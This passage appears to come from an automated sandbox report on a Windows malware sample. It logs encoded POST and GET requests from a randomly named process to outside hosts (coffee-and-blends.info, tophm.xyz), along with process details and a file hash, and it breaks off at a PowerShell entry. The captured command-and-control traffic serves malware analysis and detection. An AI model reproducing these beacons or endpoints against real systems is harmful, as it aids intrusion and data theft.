                                                    9 | 192.168.2.9 | 49989 | 217.160.0.231 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:43.294836998 CEST | 805 | OUT | POST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Ascii: 8T2hn=GbyCZQ1wfxppnL7N87J2g8oZK+WypDSdQVe09XWK6oSAOVjsGcVPpLx2E5RC4C/JbsJ6Xtid1jJhJNWFgzkKoAZrfwiuKO6Sf6VPAfdYAPY0uJHyOeWJmWQjC6QCquz7CxsHx9ZC1GTBENTqGEqZvU/756MT72JAFE+HxHWZm5EJL0Q/e25FK4lfa1df
                                                    Oct 9, 2024 14:02:44.031128883 CEST | 779 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:43 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.9 | 49990 | 217.160.0.231 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:45.892370939 CEST | 829 | OUT | POST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Ascii: 8T2hn=GbyCZQ1wfxppmrrN/Yh2mcprGeWygjSZQUi09WDR7a2AO3rsFdVPsLx2QpQKgi/8bsEPXsOd1jNhJIqFhCkFuAZlTQiWVe6Sf6VPAf49AJw0u6PyP/WI92QkVKQC9+z/Cxslx8F81E7BEMjqGQ2ekU/51qN81lwecGe5/Gm6m7E1B1whPEwefvl4dSU3SXS2rzm7yM4IPv2rlLQzeQ==
                                                    Oct 9, 2024 14:02:46.528211117 CEST | 779 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:46 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.9 | 49991 | 217.160.0.231 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:48.490209103 CEST | 1842 | OUT | POST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:49.191828012 CEST | 779 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:49 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.9 | 49992 | 217.160.0.231 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:51.068710089 CEST | 522 | OUT | GET /fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:51.703099012 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Content-Length: 1271
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:51 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                    Timestamp: Oct 9, 2024 14:02:51.703176975 CEST, Bytes transferred: 203, Direction: IN, Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                    Session ID: 13, Source IP: 192.168.2.9, Source Port: 49993, Destination IP: 199.192.21.169, Destination Port: 80, PID: 6280, Process: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp: Oct 9, 2024 14:02:56.771025896 CEST, Bytes transferred: 766, Direction: OUT, Data: POST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 31 6f 55 46 68 72 47 4a 38 39 56 53 2b 55 61 49 6d 7a 66 50 39 66 39 35 43 51 4c 54 6f 36 62 4b 53 45 32 78 77 77 6a 43 42 43 57 43 79 6c 43 73 73 59 5a 78 4e 36 4e 4c 45 58 57 4f 6f 47 41 66 6f 38 32 70 65 42 4c 6a 35 35 42 6e 78 72 45 52 43 41 5a 59 4a 33 69 4b 61 53 56 64 52 76 79 58 2b 50 54 44 56 78 64 74 48 61 42 66 36 63 31 62 32 48 34 71 51 6c 58 50 50 34 47 77 46 41 4c 79 6d 6a 4e 39 66 78 64 4f 62 65 33 47 30 50 50 6b 50 43 62 54 65 44 30 6f 33 49 65 4f 72 54 4e 57 48 44 71 4a 64 53 69 77 78 48 31 51 4b 6c 48 7a
                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG1oUFhrGJ89VS+UaImzfP9f95CQLTo6bKSE2xwwjCBCWCylCssYZxN6NLEXWOoGAfo82peBLj55BnxrERCAZYJ3iKaSVdRvyX+PTDVxdtHaBf6c1b2H4qQlXPP4GwFALymjN9fxdObe3G0PPkPCbTeD0o3IeOrTNWHDqJdSiwxH1QKlHz
                                                    Timestamp: Oct 9, 2024 14:02:57.355895042 CEST, Bytes transferred: 980, Direction: IN, Data: HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:57 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session ID: 14, Source IP: 192.168.2.9, Source Port: 49994, Destination IP: 199.192.21.169, Destination Port: 80, PID: 6280, Process: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp: Oct 9, 2024 14:02:59.311409950 CEST, Bytes transferred: 790, Direction: OUT, Data: POST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 33 49 6b 46 6a 4b 47 4a 30 39 56 56 78 30 61 49 78 6a 65 45 39 66 68 35 43 52 2f 44 6f 50 44 4b 52 6d 75 78 7a 78 6a 43 47 43 57 43 39 46 43 70 78 49 5a 32 4e 36 4a 35 45 57 47 4f 6f 43 51 66 6f 34 79 70 66 79 6a 67 34 70 42 6c 36 4c 45 58 64 77 5a 59 4a 33 69 4b 61 53 42 33 52 76 36 58 2b 65 6a 44 61 77 63 37 4b 36 42 41 74 73 31 62 67 33 35 68 51 6c 58 35 50 35 61 61 46 44 6a 79 6d 6d 78 39 65 6c 42 4e 55 65 33 41 34 66 4f 59 65 58 47 78 54 52 6f 6a 77 72 2f 71 71 51 35 7a 45 69 4b 58 4d 67 72 72 6b 51 31 33 4e 43 4f 62 45 70 63 4d 4b 4c 31 54 7a 52 77 46 66 75 44 4e 4b 56 4e 51 6e 51 3d 3d
                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG3IkFjKGJ09VVx0aIxjeE9fh5CR/DoPDKRmuxzxjCGCWC9FCpxIZ2N6J5EWGOoCQfo4ypfyjg4pBl6LEXdwZYJ3iKaSB3Rv6X+ejDawc7K6BAts1bg35hQlX5P5aaFDjymmx9elBNUe3A4fOYeXGxTRojwr/qqQ5zEiKXMgrrkQ13NCObEpcMKL1TzRwFfuDNKVNQnQ==
                                                    Timestamp: Oct 9, 2024 14:02:59.899641991 CEST, Bytes transferred: 980, Direction: IN, Data: HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:59 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session ID: 15, Source IP: 192.168.2.9, Source Port: 49995, Destination IP: 199.192.21.169, Destination Port: 80, PID: 6280, Process: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp: Oct 9, 2024 14:03:01.862705946 CEST, Bytes transferred: 1803, Direction: OUT, Data: POST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 33 49 6b 46 6a 4b 47 4a 30 39 56 56 78 30 61 49 78 6a 65 45 39 66 68 35 43 52 2f 44 6f 50 4c 4b 52 54 79 78 77 53 37 43 48 43 57 43 77 6c 43 6f 78 49 5a 72 4e 2b 64 39 45 54 66 37 6f 41 59 66 71 64 6d 70 50 54 6a 67 68 35 42 6c 31 72 45 57 43 41 5a 42 4a 33 53 4f 61 53 52 33 52 76 36 58 2b 63 37 44 54 42 63 37 49 36 42 66 36 63 31 66 32 48 35 4a 51 6c 4f 4d 50 35 75 67 45 7a 44 79 6e 47 42 39 53 77 64 4e 4c 75 33 43 37 66 4f 41 65 58 43 48 54 52 30 6e 77 71 4b 2f 71 51 42 7a 48 58 7a 67 58 67 6a 6b 35 77 46 55 45 43 61 51 4c 2b 45 4d 53 71 34 42 75 7a 5a 67 45 73 65 6a 4f 68 4d 39 79 65 57 62 39 33 39 56 59 4e 35 66 73 46 74 58 33 4f 31 7a 65 69 64 55 7a 32 7a 77 78 58 4f 4b 36 54 47 32 4c 33 73 42 48 4e 4f 72 78 31 78 6e 4a 6a 78 39 4d 33 64 64 6e 57 58 57 31 45 30 4c 68 69 48 55 74 58 59 36 51 2b 45 2b 49 62 6e 48 55 58 35 67 30 48 42 43 67 77 38 57 30 79 61 42 73 35 33 77 37 55 30 43 47 63 49 47 44 45 47 6b 6e 64 30 61 62 4e 4b 73 44 6c 70 64 [TRUNCATED]
                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG3IkFjKGJ09VVx0aIxjeE9fh5CR/DoPLKRTyxwS7CHCWCwlCoxIZrN+d9ETf7oAYfqdmpPTjgh5Bl1rEWCAZBJ3SOaSR3Rv6X+c7DTBc7I6Bf6c1f2H5JQlOMP5ugEzDynGB9SwdNLu3C7fOAeXCHTR0nwqK/qQBzHXzgXgjk5wFUECaQL+EMSq4BuzZgEsejOhM9yeWb939VYN5fsFtX3O1zeidUz2zwxXOK6TG2L3sBHNOrx1xnJjx9M3ddnWXW1E0LhiHUtXY6Q+E+IbnHUX5g0HBCgw8W0yaBs53w7U0CGcIGDEGknd0abNKsDlpdYLaDqQVDGJfyAHe0/ZGvUwScjl6X49r4w33i6J1dbEglauCv74XPrJuhi9JsszWqL8EJXMZUZNzb/7h3f26EyrCz8n21OhfW0XTtxOGo2aAtrd3RDx25LBFxbwGW7dd/FWPDUWn1NPkEZVOiDKnJ9dXTxoBxYAIoYcfIiSF/Xw0N/4DdWnzmPh6J40BI7AY+wiH9fN4ayrLrQGdGeu4wLNKNG7XTYbV6Cu/l2MHe4AzboE0p48S2HUlRsdMfUd02d1PrOY9NF8AEqLazO0tPlEvjMcUGemEGAsNdo9jD/DSUFF5sfYIPTplsY+uLVVkK5h6XI6T0nPkq7N/u7A9NgVj8EIAq0yNX4J9SG2xhXN03diT+78u6CaEhUeldneezy9oEL3M9DGsoBENADjrz1X8u6BI7NDMMrqU6bfv+hwE4OanT7WX2s+mpEOCknzTnXRBjCB3NsGLqG4px/GUhyJo1qyL3AUet/tBNCoKwyprHr/1dNXwZ41TNcW/9ZxUxdVnta7ftoV+13h1Z3+cb2M+0eNGS8iwNgB+GaiHvz6GbDEppGNpbDSbQ0e1sQ1EZxWQkzjf7pUfRdfGNYDTElgkZf8us72RKrMEAp0U31InFXKJSh2B/G/tWV52YSmB5sY5/PUE6WCElh9BKQtgeMu6KwrD6PFroC1 [TRUNCATED]
                                                    Timestamp: Oct 9, 2024 14:03:02.522177935 CEST, Bytes transferred: 980, Direction: IN, Data: HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:03:02 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session ID: 16, Source IP: 192.168.2.9, Source Port: 49996, Destination IP: 199.192.21.169, Destination Port: 80
                                                    Timestamp: Oct 9, 2024 14:03:04.979829073 CEST, Bytes transferred: 509, Direction: OUT, Data: GET /30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw== HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Timestamp: Oct 9, 2024 14:03:05.563469887 CEST, Bytes transferred: 995, Direction: IN, Data: HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:03:05 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Target ID:0
                                                    Start time:08:00:57
                                                    Start date:09/10/2024
                                                    Path:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0x610000
                                                    File size:694'784 bytes
                                                    MD5 hash:519B9A9E52AA6E23736F01AFA4001654
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
